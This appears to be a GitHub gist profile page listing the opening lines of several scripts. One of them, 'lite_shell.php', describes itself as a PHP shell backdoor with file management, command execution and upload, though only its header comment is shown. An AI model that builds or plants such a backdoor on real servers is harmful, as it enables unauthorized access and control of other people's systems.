Skip to content

Instantly share code, notes, and snippets.

View justalinko's full-sized avatar
🏠
Working from home

shutdown57 justalinko

🏠
Working from home
View GitHub Profile
@justalinko
justalinko / lite_shell.php
Created August 3, 2018 18:14
Lite shell - lightweight simple shell backdoor
<?php
/**
* Lite 1.0
*
* [ Lite - Simple shell backdoor ].
* [ Feature : Filemanager,command,upload,php,server info,etc. ]
*
* @author shutdown57 < alinkokomansuby@gmail.com >
* @version 1.0
* @copyright (c) 2018 Alinko.
<?php
// --------------------------------------------------------------------------------
// PhpConcept Library - Zip Module 2.8.2
// --------------------------------------------------------------------------------
// License GNU/LGPL - Vincent Blavet - August 2009
// http://www.phpconcept.net
// --------------------------------------------------------------------------------
//
// Presentation :
// PclZip is a PHP library that manage ZIP archives.
@justalinko
justalinko / holla
Created September 16, 2020 17:39
Holla is command line interface for HiFramework {HijaIyh Private Framework}
#!/usr/bin/php
<?php
/**
* @author shutdown57
* @author KarangranduCoder
*
* @copyright 2018-2020
*
* Holla is command line interface for HiFramework {HijaIyh Private Framework}
* Continue project from "hifw"
@justalinko
justalinko / c9setup
Last active February 14, 2023 13:19
c9setup.sh
#!/bin/bash
LOCALUSER=$1
if [ $LOCALUSER == "" ]; then
echo "./$0 <username>"
exit 1
fi
echo "Cleaning ......."